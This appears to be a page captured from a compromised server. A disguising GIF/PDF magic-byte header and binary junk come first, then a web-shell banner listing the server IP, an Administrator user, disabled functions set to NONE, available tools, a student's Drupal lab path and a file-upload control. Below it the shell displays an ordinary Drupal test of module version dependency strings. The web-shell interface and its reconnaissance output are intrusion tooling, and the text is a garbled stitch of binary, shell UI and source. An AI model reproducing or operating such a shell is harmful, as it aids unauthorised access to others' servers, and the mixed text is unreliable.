GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/system/src/Tests/Module/ |
Upload File : |
<?php namespace Drupal\system\Tests\Module; /** * Tests module version dependencies. * * @group Module */ class VersionTest extends ModuleTestBase { /** * Test version dependencies. */ public function testModuleVersions() { $dependencies = [ // Alternating between being compatible and incompatible with 8.x-2.4-beta3. // The first is always a compatible. 'common_test', // Branch incompatibility. 'common_test (1.x)', // Branch compatibility. 'common_test (2.x)', // Another branch incompatibility. 'common_test (>2.x)', // Another branch compatibility. 'common_test (<=2.x)', // Another branch incompatibility. 'common_test (<2.x)', // Another branch compatibility. 'common_test (>=2.x)', // Nonsense, misses a dash. Incompatible with everything. 'common_test (=8.x2.x, >=2.4)', // Core version is optional. Compatible. 'common_test (=8.x-2.x, >=2.4-alpha2)', // Test !=, explicitly incompatible. 'common_test (=2.x, !=2.4-beta3)', // Three operations. Compatible. 'common_test (=2.x, !=2.3, <2.5)', // Testing extra version. Incompatible. 'common_test (<=2.4-beta2)', // Testing extra version. Compatible. 'common_test (>2.4-beta2)', // Testing extra version. Incompatible. 'common_test (>2.4-rc0)', ]; \Drupal::state()->set('system_test.dependencies', $dependencies); $n = count($dependencies); for ($i = 0; $i < $n; $i++) { $this->drupalGet('admin/modules'); $checkbox = $this->xpath('//input[@id="edit-modules-module-test-enable"]'); $this->assertEqual(!empty($checkbox[0]['disabled']), $i % 2, $dependencies[$i]); } } }